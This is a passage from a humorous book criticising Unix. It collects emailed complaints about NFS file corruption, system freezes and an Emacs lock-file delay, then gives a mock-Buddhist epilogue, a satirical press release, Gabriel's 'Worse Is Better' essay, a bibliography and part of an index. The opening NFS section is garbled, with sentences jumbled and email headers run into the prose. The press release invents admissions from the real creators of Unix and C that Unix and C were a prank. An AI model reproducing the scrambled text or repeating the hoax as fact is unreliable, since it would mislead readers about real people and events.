produce inexplicable results. when these decisions were made. occasionally. different versions of NFS interact with each other in strange ways and. boston-harbor% rmdir foo rmdir: foo: Not a directory boston-harbor% rm foo rm: foo is a directory Eek? How did I do this??? Thusly: boston-harbor% mkdir foo boston-harbor% cat > foo I did get an error from cat that foo was a directory so it couldn’t output. if the directory has FILES in it. by default.294 NFS One of the reason that NFS silently corrupts files is that. At least.com> UNIX-HATERS Unix / NFS does it again. However.. This made my day so much more pleasant… Such a well-designed computer system. Unfortunately. This freezing happens under many different circumstances with many different versions of NFS. doesn’t it? After all. and the net is usually reliable. they go to never-never land. due to the magic of NFS. it had deleted the directory and had created an empty file for my cat output. Date: From: To: Subject: Tue. 15 Jan 91 14:38:00 EST Judy Anderson <yduj@lucid.. that was the state-of-the-art back in 1984 and 1985. NFS is supposed to know the difference between files and directories. Of course. calculating checksums takes a long time. yduJ (Judy Anderson) 'yduJ' rhymes with 'fudge' yduJ@lucid. Makes sense. Sometimes it happens because file systems are hard-mounted and a . Oops. NFS is delivered with UDP checksum error-detection systems turned off.com Freeze Frame! NFS frequently stops your computer dead in its tracks.
it will start corrupting data due to problems with NFS’s write-back cache. The file then loads and everything works fine. GNU Emacs is one of these programs.Not File System Specific? (Not Quite) 295 file server goes down.mit.msi. one of the really smart people who works here at the Center.umn. and it is too heavily loaded.57 unless you can also supply a pointer to diffs or at least sand m.edu4 In article <1991Sep16.umn. In about 1 in 10 times the file loads immediately with no delay at all. When that file wasn’t there.umn.ai. (Please don’t tell me to upgrade to version 18.231808. The full explanation follows. one quick hack to correct it is to make /usr/lib/emacs/lock be a symbolic link to /tmp. Here is what happens when you try to mount the directory /usr/lib/emacs/ lock over NFS: Date: Wed.1 of the system.files for the NeXT.geom. neither was the delay (usually). Meuer) writes: I have a NeXT with version 2. We have Emacs 18. and when that file existed the delay would occur. I was able to track down that there was a file called !!!SuperLock!!! in /usr/lib/emacs/lock. but the obnoxious delay was finally explained and corrected by Scott Bertilson. The problem is that whenever I try to find a file (either through “C-x C-f”. Several people sent me suggestions (thank you!). Another way that NFS can also freeze your system is with certain programs that expect to be able to use the Unix system call creat() with the POSIXstandard “exclusive-create” flag.edu> meuer@roch. Why not soft-mount the server instead? Because if a server is soft-mounted.edu (Mark V.55 running. 18 Sep 1991 02:16:03 GMT From: meuer@roch. “emacs file” or through a client talking to the server) Emacs freezes completely for between 15 and 30 seconds. Meuer) Organization: Minnesota Supercomputer Institute Subject: Re: File find delay within Emacs on a NeXT To: help-gnu-emacs@prep. 4 Forwarded to UNIX-HATERS by Michael Tiemann.geom. .) There are several machines in our network and we are using yellow pages.edu (Mark V. For people who have had this problem.9812@s1.
. The hack we used to cure this problem was to make /usr/lib/emacs/lock be a symbolic link to /tmp.”. The problem we had was that /usr/lib/emacs/lock was mounted over NFS. so that it would always point to a local directory and avoid the NFS exclusive create bug. Since Emacs thinks it wasn't able to create the lock file. It’s nice to know that there are so many friendly people on the net. “. If the exclusive create fails. The freezing is exacerbated by any program that needs to obtain the name of the current directory. this process is all automated for you by a function called getcwd(). When Emacs tries to open a file to edit. That’s the name of your directory. Manning at the MIT AI Lab got bitten by this bug in late 1990.”—which is really the parent directory—and then to search for a directory in that directory that has the same inode number as the current directory. . After 20 tries it just ignores the lock file being there and opens the file the user wanted. it opens the user’s file and then immediately removes the lock file. Unfortunately. “.) Fortunately. Unix still provides no simple mechanism for a process to discover its “current directory.”. and apparently NFS doesn’t handle exclusive create as well as one would hope. it tries 19 more times with a one second delay between each try. That was what was causing the delay. Carl R. it never removes it. the only way to find out its name is to open the contained directory “. I know this is far from perfect.” If you have a current directory. But since it did create the file. Thanks to everyone who responded to my plea for help. all future attempts to open files encounter this lock file and force Emacs to go through a 20-second loop before proceeding. programs that use getcwd() unexpectedly freeze. If it succeeds in creating the lock file. it tries to do an exclusive create on the superlock file.296 NFS We found the segment of code that was causing the problem. (Notice that this process fails with directories that are the target of symbolic links. but so far it is working correctly. but return an error saying it didn’t. The command would create the file.
edu Wed.mit. Not Supporting Multiple Architectures Unix was designed in a homogeneous world.edu> Date: From: Out of curiosity. If any of those file systems is not responding.. some directories (such as /usr/etc) contain a mix of architecture-specific and architecture-dependent files. Unfortunately. Sun brain damage. 12 Dec 90 15:07 EST Jerry Roylance <glr@ai. SUN-FORUM@ai.mit. when AB or WH have been down recently for disk problems. I couldn’t start up an Emacs on RC. Unix makes no provision for stuffing multiple architecture-specific object modules into a single file. and getcwd wanders down the mounted file systems in /etc/mtab. How nice! Hope you aren’t doing anything else important on the machine. Unlike other operating systems (such as Mach).mit. (Booting RC would fix the problem. 12 Dec 90 14:16 EST Carl R.edu. . Emacs calls getcwd. maintaining a heterogeneous world (even with hosts all from the same vendor) requires amazingly complex mount tables and file system structures.mit.g.edu> Emacs needs all file servers? (was: AB going down) CarlManning@ai.) Booting rice-chex would fix the problem. NFS makes no provisions for the fact that different kinds of clients might need to “see” different files in the same place of their file systems. is there a good reason why Emacs can’t start up (e. Manning <CarlManning@ai.g.mit. despite the fact that I had no intention of touching any files on AB or WH..Not File System Specific? (Not Quite) 297 Date: From: Subject: To: Cc: Wed. on rice-chex) when any of the file servers are down? E. Emacs waits for the timeout. and even so. You can see what sort of problems breed as a result: 5 Forwarded to UNIX-HATERS by Steve Robbins. An out-to-lunch file system would be common on public machines such as RC. Unlike other network file systems (such as the Andrew File System).edu5 SYSTEM-HACKERS@ai.
Once I got the server running. Naturally enough. so I sent mail to the original author asking about this. those files were already in the appropriate places. Meanwhile. I couldn't find the program (which had a horrid path down in the source hierarchy). Last night. There's a makefile entry for compiling this entry. 5 Jan 90 14:44 CST Chris Garrigues <7thSon@slcs.500 stuff from NYSERnet (which is actually a fairly nicely put-together system.500 server down by loading a broken database into it. so I won on all the machines with the same architecture (SUN3.298 NFS Date: From: Subject: To: Fri. so it remains in the source hierarchy. I got it working. and I would have to start with . Well. it had been deleted by the .slb./make distribution and rebuild everything. I came to a piece of documentation which says that to run just the user end. finally got it working. but not for installing it. but they provide a program that will scan a datafile to see if it’s OK. There were no instructions on how to compile only the client side. in this case). There is a lot of code that you need for a server. by Unix standards)./make distribution (Isn't that what you would call the command for deleting everything?). but I succeeded. I brought my X. since we use NFS. I need to copy certain files onto the client hosts. It seems that someone realized that you could never assume that root on another system was trustworthy. However. I compiled all this code. and after some struggle. and after finding out which data files I was going to have to copy over as well (not documented. If you try and load a database with duplicate entries into your running system. Most of the struggle was in trying to compile a system that resided across file systems and that assumed that you would do the compilation as root. I cleaned up the database by hand and then decided to be rational and run it through their program. He said there was no easy way to do this. many of our machines are SUN4s. it crashes. it took a few hours to do this. I . Since this is a large system. so root has fewer privileges than I do when logged in as myself in this context. I had been building databases for the system.com> Multiple architecture woes UNIX-HATERS I’ve been bringing up the X. of course).
Not File System Specific? (Not Quite) 299 thought. where it assumes that the user is evil and can’t be trusted no matter what. Normally this just means that you can never find the source to a given binary. 2) Unix was designed in a networkless world. . I got mail last night from the author of this system telling me to relax because this is supposed to be fun. there is a single priv’d user who can do anything. I’ll recompile it. I wonder if Usenix attendees sit in their hotel rooms and stab themselves in the leg with X-Acto knives for fun. 3) NFS assumes that the client has done user validation in all cases except for root access.” This didn’t work either because it was depending on intermediate files that had been recompiled for the other architecture. Maybe at Usenix. they all get together in the hotel’s grand ballroom and stab themselves in the leg as a group. So… What losing Unix features caused me grief here. but it gets even hairier in a heterogeneous environment because you can keep the intermediate files for only one version at a time. and most systems that run on it assume at some level or other that you are only using one host. 1) Rather than having a rational scheme of priv bits on users. “Fine. and then moving the things you need to another. 4) Unix has this strange idea of building your system in one place.
302 .
Part 4: Et Cetera .
304 .
Curious as to what exec might do. 1 Dec 90 00:47:28 -0500 Enlightenment through Unix UNIX-HATERS Unix teaches us about the transitory nature of all things.media. Unix is the world. The world is Unix. . Both processes and the disapperance of processes are illusory. then proceeded to kill the shell and every other window I had.mit. In the past I might have gotten upset or angry at such an occurrence. I typed “exec ls” to a shell window. thus ridding us of samsaric attachments and hastening enlightenment. while trying to make sense of an X initialization script someone had given me. For instance. I no longer have attachments to my processes. Now. laboring ceaslessly for the salvation of all sentient beings. It listed a directory.edu> Sat.A Epilogue Enlightenment Through Unix From: Date: Subject: To: Michael Travers <mt@media-lab. leaving the screen almost totally black with a tiny white inactive cursor hanging at the bottom to remind me that nothing is absolute and all things partake of their opposite. That was before I found enlightenment through Unix. I came across a line that looked like an ordinary Unix shell command with the term “exec” prefaced to it.
306 .
and Brian Kernighan admitted that the Unix operating system and C programming language created by them is an elaborate April Fools prank kept alive for more than 20 years. As a lark. Dennis Ritchie. we decided to do parodies of the Multics environment and Pascal. Dennis had just finished reading Bored of the Rings. called “A. a hilarious National Lampoon parody of the great Tolkien Lord of the Rings trilogy.” When we found others were actually trying to create real . Brian and I had just started working with an early release of Pascal from Professor Nichlaus Wirth’s ETH labs in Switzerland. as well as other more risque allusions. Speaking at the recent UnixWorld Software Development Forum. “Then Dennis and Brian worked on a truly warped version of Pascal.B Creators Admit C. and we were impressed with its elegant simplicity and power. We looked at Multics and designed the new system to be as complex and cryptic as possible to maximize casual users’ frustration levels. Ken Thompson. AT&T had just terminated their work with the GE/AT&T Multics project. Dennis and I were responsible for the operating environment. calling it Unix as a parody of Multics. Thompson revealed the following: “In 1969. Unix Were Hoax FOR IMMEDIATE RELEASE In an announcement that has stunned the computer industry.
Hewlett-Packard. We stopped when we got a clean compile on the following syntax: for(. T. “In any event. confusion. Modula 2. and finally C. “To think that modern programmers would try to use a language that allowed such a statement was beyond our comprehension! We actually thought of selling this to the Soviets to set their computer science progress back 20 or more years. NCR.e=P("_"+(*u++/ 8)%2))P("|"+(*u/4)%2). Brian. Dennis.” In a cryptic statement. and DEC have refused comment at this time. merely stating “Workplace OS will be available Real Soon Now. and I have been working exclusively in Lisp on the Apple Macintosh for the past few years and feel really guilty about the chaos. and Turbo C++. including AT&T. GTE. we quickly added additional cryptic features and evolved into B. Borland International.S. corporations actually began trying to use Unix and C! It has taken them 20 years to develop enough expertise to generate even marginally useful applications using this 1960s technological parody. An IBM spokesman broke into uncontrolled laughter and had to postpone a hastily convened news conference concerning the fate of the RS/6000. Imagine our surprise when AT&T and other U. stated they had suspected this for a number of years and would continue to enhance their Pascal products and halt further efforts to develop C. Barnum was correct. and truly bad programming that has resulted from our silly prank so long ago. Unix Were Hoax programs with A.308 Creators Admit C. . merely stated that P. including the popular Turbo Pascal. but we are impressed with the tenacity (if not common sense) of the general Unix and C programmer.R=. Turbo C.P("\n"). and Oberon structured languages. Microsoft.” Major Unix and C vendors and customers.P("|"))for(e=C. Professor Wirth of the ETH Institute and father of the Pascal. a leading vendor of Pascal and C tools. BCPL.
309 .
310 .
© 1991 Richard P. Gabriel. Bad News. It is more important for the interface to be simple than that the implementation be simple.”1 I. • Consistency—the design must not be inconsistent.C The Rise of Worse Is Better By Richard P. A design is allowed to be slightly less simple and less complete to avoid inconsistency. which originally appeared in the April 1991 issue of AI Expert magazine. Incorrectness is simply not allowed.” by Richard P. and just about every designer of Common Lisp and CLOS. Permission to reprint granted by the author and AI Expert. have had extreme exposure to the MIT/Stanford style of design. both in implementation and interface. Gabriel. The two philosophies are called “The Right Thing” and “Worse Is Better. Gabriel The key problem with Lisp today stems from the tension between two opposing software philosophies. • Correctness—the design must be correct in all observable aspects. Consistency is as important as correctness. The essence of this style can be captured by the phrase “the right thing. How to Win Big. 1 This is an excerpt from a much larger article. “Lisp: Good News.” To such a designer it is important to get all of the following characteristics right: • Simplicity—the design must be simple. .
Completeness can be sacrificed in favor of any other quality. especially worthless is consistency of interface. The worse-is-better philosophy is only slightly different: • Simplicity—the design must be simple. All reasonably expected cases should be covered. It is more important for the implementation to be simple than the interface. • Completeness—the design must cover as many important situations as is practical. I believe that worse-is-better. completeness must be sacrificed whenever implementation simplicity is jeopardized. both in implementation and interface. Consistency can be sacrificed to achieve completeness if simplicity is retained. All reasonably expected cases must be covered. and I will call the use of this design strategy the “New Jersey approach. In fact. but it is better to drop those parts of the design that deal with less common circumstances than to introduce either implementational complexity or inconsistency. .312 The Rise of Worse Is Better • Completeness—the design must cover as many important situations as is practical. • Correctness—the design must be correct in all observable aspects. and that the New Jersey approach when used for software is a better approach than the MIT approach. I believe most people would agree that these are all good characteristics. even in its strawman form.” I have intentionally caricatured the worse-is-better philosophy to convince you that it is obviously a bad philosophy and that the New Jersey approach is a bad approach. It is slightly better to be simple than correct. Unix and C are examples of the use of this school of design. I will call the use of this philosophy of design the “MIT approach. Let me start out by retelling a story that shows that the MIT/New Jersey distinction is valid and that proponents of each philosophy actually believe their philosophy is better. has better survival characteristics than the-right-thing. Simplicity is the most important consideration in a design.” Common Lisp (with CLOS) and Scheme represent the MIT approach to design and implementation. However. • Consistency—the design must not be overly inconsistent. Consistency can be sacrificed for simplicity in some cases. Simplicity is not allowed to overly reduce completeness.
If an interrupt occurs during the operation. The right thing is to back out and restore the user program PC to the instruction that invoked the system routine so that resumption of the user program after the interrupt. The person from MIT was knowledgeable about ITS (the MIT AI Lab operating system) and had been reading the Unix sources.313 Two famous people. The MIT guy then muttered that sometimes it takes a tough man to make a tender chicken. reenters the system routine. then. The New Jersey guy said that the right trade off has been selected in Unix—namely. but the New Jersey guy didn’t understand (I’m not sure I do either). The MIT guy did not see any code that handled this case and asked the New Jersey guy how the problem was handled. Now I want to argue that worse-is-better is better. Besides. It is called “PC loser-ing” because the PC is being coerced into “loser mode. He was interested in how Unix solved the PC2 loser-ing problem. programmers could easily insert this extra test and loop. The PC is a register inside the computer’s central processing unit that keeps track of the current execution point inside a running program. implementation simplicity was more important than interface simplicity. once met to discuss operating system issues. Because the invocation of the system routine is usually a single instruction. but the solution was for the system routine to always finish. but sometimes an error code would be returned that signaled that the system routine had failed to complete its action. C is a programming language designed for writing Unix. The MIT guy pointed out that the implementation was simple but the interface to the functionality was complex. and it was designed using the New Jersey approach. . The New Jersey guy said that the Unix solution was right because the design philosophy of Unix was simplicity and that the right thing was too complex. The PC loser-ing problem occurs when a user program invokes a system routine to perform a lengthy operation that might have significant state. for example. such an input/output operation involving IO buffers. A correct user program. C is therefore a language for which it is easy to write a decent 2 Program Counter. the state of the user program must be saved. had to check the error code to determine whether to simply try the system routine again. one from MIT and another from Berkeley (but working on Unix). The system routine must either back out or press forward. The MIT guy did not like this solution because it was not the right thing. the PC of the user program does not adequately capture the state of the process. The New Jersey guy said that the Unix folks were aware of the problem.” where “loser” is the affectionate name for “user” at MIT.
The worse-is-better philosophy means that implementation simplicity has highest priority. and it requires the programmer to write text that is easy for the compiler to interpret. The good news is that in 1995 we will have a good operating system and programming language. one expects that if the 50% functionality Unix and C support is satisfactory. Some have called C a fancy assembly language. they will start to appear everywhere. large systems must be designed to reuse components. The “big complex system” scenario goes like this: . Both early Unix and C compilers had simple structures. and provide about 50% to 80% of what you want from an operating system and programming language. In concrete terms. haven’t they? Unix and C are the ultimate computer viruses. require few machine resources to run. and hassle to get good performance and modest resource use. It is important to remember that the initial virus has to be basically good. which means Unix and C are easy to port on such machines. There is a final benefit to worse-is-better. A further benefit of the worse-is-better philosophy is that the programmer is conditioned to sacrifice some safety. Programs written using the New Jersey approach will work well in both small machines and large ones. there are many more compiler experts who want to make C compilers better than want to make Lisp compilers better. Once the virus has spread. and third will be improved to a point that is almost the right thing. And they have. and the code will be portable because it is written on top of a virus. the bad news is that they will be Unix and C++. Therefore. but users have already been conditioned to accept worse than the right thing. How does the right thing stack up? There are two basic scenarios: the “big complex system scenario” and the “diamond-like jewel” scenario. Unix and C work fine on them. are easy to port. even though Lisp compilers in 1987 were about as good as C compilers. possibly by increasing its functionality closer to 90%. Therefore. the viral spread is assured as long as it is portable. the worse-is-better software first will gain acceptance. there will be pressure to improve it. If so. Because a New Jersey language and system are not really powerful enough to build complex monolithic software.314 The Rise of Worse Is Better compiler. Half the computers that exist at any point are worse than median (smaller or slower). convenience. second will condition its users to expect less. Therefore. a tradition of integration springs up.
The first scenario is also the scenario for classic artificial intelligence software. and implementation simplicity was never a concern so it takes a long time to implement. the right thing needs to be designed. it has nearly 100% of desired functionality. It is better to get half of the right thing available so that it spreads like a virus. but for no reason other than that the right thing is often designed monolithically. A wrong lesson is to take the parable literally and to conclude that C is the right vehicle for AI software. Then its implementation needs to be designed. The last 20% takes 80% of the effort. The lesson to be learned from this is that it is often undesirable to go for the right thing first. The right thing is frequently a monolithic piece of software. take the time to improve it to 90% of the right thing. but in this case it isn’t. The two scenarios correspond to Common Lisp and Scheme. That is. To implement it to run fast is either impossible or beyond the capabilities of most implementors. Because it is the right thing. It requires complex tools to use properly. and it only runs satisfactorily on the most sophisticated hardware. and so the right thing takes a long time to get out. . The 50% solution has to be basically right. but it is quite small at every point along the way.315 First. The “diamond-like jewel” scenario goes like this: The right thing takes forever to design. this characteristic is a happenstance. It is large and complex. Finally it is implemented. Once people are hooked on it.
.
The Andromeda Strain. Coplien. “Expertise in a Computer Operating System. Michael. Advanced C++: Programming Styles and Idioms.. Doane. sendmail. Crichton.” Summer 1985 USENIX. Michael. Jurassic Park.” January 1983 USENIX. O’Reilly & Associates. Vol 5. Crichton. Knopf. Numbers 2 and 3. 1969. Costales. 1992. and Miriam Amos. 1990. Internetworking with TCP/IP. et al. 1993. “Mail Systems and Addressing in 4. “Sendmail Revisited.2bsd. Bryan. Eric. Eric Allman. Douglas. Allman. Prentice Hall 1993. Addison-Wesley. Comer. Eric. Stephanie M.D Bibliography Just When You Thought You Were Out of the Woods… Allman.” Journal of Human-Computer Interaction. James O. . Knopf. and Neil Rickert.
April 1981. 1984. Doubleday. Tannenbaum. DC USENIX Conference.” Datamation. Doubleday. B. 1990. 1991. “Lisp: Good News. 1992. Cliff. “Politics of UNIX. Vinge. How to Win Big. November 1981 Pandya. Berkeley Medallion Books. and So. April 1981. et al. Donald A. Practical UNIX Security. Warren. Liskov. December 1990. Life with UNIX: A Guide for Everyone. Miller.” Washington.” Communications of the ACM. D. and Mashey. The Design Of Everyday Things. Norman. Libes. F.” AI Expert. pp. Colossus. Donald A. Inc. University of Colorado at Boulder. Springer-Verlag.” IEEE Computer. Kernighan. 1989. Teitelman. Don. and Sandy Ressler. Garfinkel.. Richard P. and Gene Spafford. April 1991. O’Reilly & Associates. Barbara. 27 (12). 1989. Stoll. Fredriksen.318 Bibliography Gabriel. A Fire Upon the Deep. “The Interlisp Programming Environment. Bad News. Zorn. 139-150. 1966. The Cuckoo’s Egg. “An Empirical Study of the Reliability of Unix Utilities. 1992. Simson. “The trouble with Unix: The user interface is horrid. Prentice-Hall. “The Unix Programming Environment. Tom Doherty Associates. and Larry Masinter. Norman. “Stepwise Refinement of Distributed Systems. 1981. Technical Report CU-CS-573-92. B. CLU reference manual.” IEEE Computer. Paritosh. . Springer. Jones. Andy. The Measured Cost of Conservative Garbage Collection.” Lecture Notes in Computer Science no 430. Vernor.
152 * 152 .Xauthority file 130 . Rick 99 adb 291 . 296 /usr/include 181 /usr/lib/emacs/lock 295.deleted 23 ” 152 ’ 152 110% 277 7thSon@slcs.xinitrc 133 . 152.xsession 133 /* You are not expected to understand this */ 55 /bin/login 251 /bin/mail 290 /bin/passwd 245 /dev/console 138 /dev/crt0 137 /dev/ocrt0 137 /etc/exports 289 /etc/getty 251 /etc/groups 244 /etc/mtab 298 /etc/passwd 73 /etc/termcap 116 /tmp 228.cshrc 118. 299 A A/UX 11 accountants 164 Adams.com 51.Index Symbols and Numbers ! 152 !!!SuperLock!!! 296 !xxx%s%s%s%s%s%s%s%s 150 "Worse Is Better" design approach 8 # 8 $ 152 % 50.Xdefaults 132. 254 .Xdefaults-hostname 133 . 241.login 118. 296 /usr/ucb/telnet 252 >From 79 ? 17. 185 ¿ 81 @ 8 ^ 152 ` 152 ~/.rhosts 244 . 134 . 254 .slb. 249 .
70. 293 chdir 154 Chiappa. 295 Andrew File System 263 Andromeda Strain 4 Anonymous 17. 203 barf bag xxxi capitalization oBNoXiOuS 141 carbon paper xx cat 30 catman 44 Cedar/Mesa xxi. 85 alt. 24.umich.com 223 alias file 70 aliasing 152 all-caps mode xvi Allen. 76. Woody 7 Allman. 276. 154. Keith 232 Breuel. 257.edu 269 Brunnstein.folklore. David 37. 28 alt. 177. 173–197 arrays 192 integer overflow 191 preprocessor 212 terseness 193 C++ 14. Eric 63.gourmand 100 alt.sgi.corp.uiuc.320 Index add_client 52 AFS 263 aglew@oberon.crhc.llnl. xxxv Chapman. 118.mit. 78.edu 267 Agre.com 50 B Ba’hai 291 backups 227. Alan 61. 64. 231 bandy@lll-crg. 78. xxxi bruce@ai. Andy 152 beldar@mips. 276. 214 API (application programmer’s interface) 114 Apollo Computers xxi. Rob 49 avocado.sources 100 American Telephone and Telegraph. 84 Bostic.computers 21. Phil xxxi. 56.com 56 clennox@ftp. moldy 77 awk 51 barf bag xxxi bash 149 Bawden.mit. 158. Noel 12 Cisco Systems 241 cj@eno. 56. xxx.edu 222 blank line in /etc/passwd 74 bnfb@ursamajor. 173.ca 160 Bored of the Rings 307 Borning. Alan 75. 6.com 132 Bell Labs 5 Berkeley bugs 185 Fast (and loose) File System 262 Network Tape 2 185 BerkNet 63 Bertilson. 288 BBN 185 Beals. 130. 288 alan@mq.edu 75. 212 C C programming language 14. 23 AIX 11 alan@ai. Scott L. Greg xxxi Anderson. Regina C. Klaus 258 bugs 186 Burson. Thomas M. Judy xxxi. 97 ASCII alternatives 88 ASR-33 Teletype 18 AT&T xix documentation 55 Auspex 241 Austein. Ken 114 ARPANET 63. 158.gov 152 . 154. Scott 296 bhoward@citi.uvic. see AT&T Amiga Persecution Attitude 141 Anderson. 118. 173 Brown. 263 Apple 11 Apple Computer Mail Disaster of 1991 85 Apple Engineering Network 86 apropos 44 ar 35 Arms for Hostages 135 Arnold.
UUCP 196 debuggers top ten reasons why they dump core 188 DEC 6. Robert 221 Crosby.UUCP 223 cosmology computational 291 cost hidden 221 cp 18. Seymour 274 creat() 295 Cringely. 207 Data General 11 Davis.questions 32 csh 149 how to crash 150 symbolic links 166 variables 159 CSH_BUILTINS 51 CSNET Relay 89 CStacy@scrc. Stephanie M.shell 153 completeness of design 312 conditions 194 configuration files 235 consistency of design 312 CORBA 13 core files 187 correctness of design 311 corwin@polari. see DEC disk backups 227 overload 256 partitions 227 underusage 277 DISPLAY environment variable 130 Display PostScript 141 Distributed Objects Everywhere.stanford.lcs. Douglas 8 command completion 9 command substitution 152 commands cryptic 18 Common Lisp 315 Communications of the ACM 190 comp.com xxxv Doane.edu 78 df 277 DGUX 11 diagnostics 56 Digital Equipment Corp. Mark E. 88 DBX Debugger Tool 129 dead baby jokes 106 debra@alice. 10.symbolics. 11.emacs 153 comp.321 client 124 client/server computing myth 127 close 189 cmdtool 239 CMU 263 Cohen. 293 Curtis.UUCP 21 dm@think.. 164 documentation 43 internal 51 online 44 shell 49 .com 26.unix.mit. Michael xxxi COLOR 133 Comer. 112 denial of service 254 dependency graph 179 DES 254 devon@ghoti.mit. Aleister 292 Crypt 253 cs.COM 153 daniel@mojave. 166 cpp 53 Cray.research. 276 cpio 148. 197. 63 dmr@plan9. Bing 8 Crowley.unix.lang.c++ 176 comp. Jim 164 Davis. Gardner 132 Cohen.edu 32. Pavel 34 D Dan_Jacobson@ATT.questions 24 FAQ 22 comp.arch newsgroup 267 comp. see DOE djones@megatest.edu 268.com 62 Cuckoo’s Egg 246 curses 113 customizing 118 curt@ai.att.
Milt 153 eric@ucbmonet. xxxv DOS 20. 12. 165 drugs 178 Duffey. Paul 32 Dragnet 87 Draper. Simson L. 248. 299 GCC 177 GE645 5 Genera 27. 51. S. John R. 166. 296. Curtis 268. 256 not working 168 symbolic links 166 too many options 148 finger 257 fingerd 257 Fire Upon the Deep 94 flock 272 Floyd Rose 131 Foner. 257 General Electric 4 getchar 193 getcwd 297 getty 251 F Fair. Erik E.edu 85 Ernst. Chris 21. 269 Garrigues. 305 "Expertise in a Computer Operating System" 164 eyeballs 136 Fast (and loose) File System 262 FEATURE-ENTENMANNS 95 Feldman. 118 Dylan xxix E East Africa xix ecstasy religious 161 ed 29. Richard P.322 Index DOE (Distributed Objects Everywhere) 14 Domain 257 Dorado xxi. 86 . 177 Freeman-Benson. Roger 98 dump scripts 234 Dunning. Bjorn 160 frog dead 189 fsck 266 FTP 248 ftp. 45 Dourish. Michael xxxi error messages 83 errors reporting 160 Eternal Recurrence 186 Ethernet 283 ‘eval resize’ 117 exceptions 194 exec 194.berkeley. Stu 185 Fennell. 8. 293 FFS 262 fg 50 fgrep 149 file 155. 298 An Empirical Study of the Reliability of Unix Utilities 190 enlightenment 305 environment variables 20 DISPLAY 130 PATH 249 TERM and TERMCAP 118 XAPPLRESDIR 133 XENVIRONMENT 133 Epstein. 311 Garfinkel. 74 file encryption 253 egrep 149 Emacs 248. 255 FrameMaker xxxii Free Software Foundation xxxv. 27. 158 deletion 23 hiden 254 name expansion 189 substitution 152 file system 262 find 47. 278 fork 248. 169. xxix.uu. W.net 185 FUBAR 86 fungus 72 G Gabriel. 241. Leonard N.
186. John 100 Glew.emacs. Dave 21 Joplin.com 194 jnc@allspice. see ITS information superhighway 98 InfoWorld 221 Inodes 265 Inspector Clouseau 27 Inter Client Communication Conventions Manual 126 Internet 63. Andy 267 Glover. 168 K Kelly. Bill 112 jrd@scrc. 175. John 150 history (shell built-in) 49 history substitution 152 Hitz.edu 298 GNU xxvi GNU manual 117 gnu. 291 Howard. 112.mit. 178 Gretzinger.323 Gildea.com 135. 11 IBM PC NFS 284 IBM PC Jr.com 233 H Hari Krishnas 162 Harrenstien. 246.symbolics. James 113. 88 Internet Engineering Task Force 79 Internet Worm 194. Grace Murray 10 Horswill. Stephen 155 Giles. Michael 162 Great Renaming. Tommy 32 Kerberos 288 kernel recompiling 225 I I39L 126 ian@ai. Kees 28 Gosling. Michael R. Michael 7 Journal of Human-Computer Interaction 164 Joy. Ken 168 Heiby.mit. 291 . 313 J January 18. 257 Internetworking with TCP/IP 7 Iran-Contra 135 ITS xxxv. Reverend 52 Hello World 215 herpes 6 Hewlett-Packard 6. Jim 161 Gilmore. Dave xxxi hoax 307 Hooverism 52 hopeless dream keeper of the intergalactic space 163 Hopkins.symbolics. 257.edu 236.edu 12 jobs command 39 killing 37 Johnson Space Center 197 Jones.help 153 Goossens.lcs. Don 223 glr@ai.mit. 10 Visual User Environment 132 hexkey 130 hidden files 254 Hinsdale. 151. 2038 193 jlm%missoula@lucid. Scott 8 Jordan. Ian D. 138 ICCCM 126 Ice Cubed 126 ident 34 IDG Programmers Press xxxii Incompatiable Timesharing System.com 164 jsh 149 Jurassic Park 155 jwz@lucid. 236. Bruce 222 HP-UX 11 IBM 10. 249. the 100 grep 149.com 12. Don xxxi Hopper. 247 gumby@cygnus. 118 jrd@src. 128 Grant. Ron 61 Heiny.
243 Manning. 30. 279 lars@myab. 237. see MIT maxslp 226 McCullough. 254 M Mach 11. 52. John xxx Klotz. Devon Sean 78 McDonald.ai. Scott 209 michael@porsche. Alan H. 148. 26.com 159. Jim 194 memory management 174. Stanley 237 lanning@parc. 203 Lerner. 166 Maeda. 241 Lisp systems 186 lock file 271 lockd 286 lockf 46. and So 190 Minsky.com 168 Klossner. 28.xerox. 165 ksh 149 L Lanning. 163 links symbolic 154 Lions.intel.com 46 Microsoft Windows 235. Dave xxxi. 179 makewhatis 44 man 36.uk 28 kill command 38 kinit 289 klh@nisc. Jerry 81. 223 Mission Control 197 MIT AI Laboratory 98.com 52. 54.sri. 54. 307 key 44 KGB 247 kgg@lfcs. Reuven xxxi Letterman. 296 Meyers. Don 37 Life with Unix 37.324 Index Kernighan. 254 MicroVax framebuffer on acid 139 Miller. 253 design style 311 Laboratory for Computer Science 124 Media Laboratory xxiii Project Athena 246 MIT-MAGIC-COOKIE-1 131 mkdir 28. 102. 189.mit.com 24 meta-point xxv metasyntactic characters 151 Meuer. 298 MANPATH 45 marketing ’droids 141 markf@altdorf.visix. 6. Henry 198 Mintz. Fredriksen. 44–51.ac. 311 and parsing 178 Lisp Machine xxi. Brian 189. 236 . 297.edu 174 Maroney. Carl R. 230 Macintosh 163. Leigh L. John 43 Lisp 173.ed. xxxv. 30 mkl@nw. 53. 205 merlyn@iwarp. 236 lpr 175 ls 18. Christopher xxx magic cookie 284 Mail 61 MAIL*LINK SMTP 88 mailing lists TWENEX-HATERS xxiv UNIX-HATERS xxiii make 36. David 188 Libes. 56 apropos 44 catman 44 key 44 makewhatis 44 pages 44 program 44 man pages 54 mangled headers 62 Mankins. 112. 272 login 251 Lord of the Rings 307 Lottor. 102. Mark V. Tim 292 Mashey 189 Massachusetts Institute of Technology. Mark xxx.se 196 LaTeX 38 leap-year 224 Leichter.
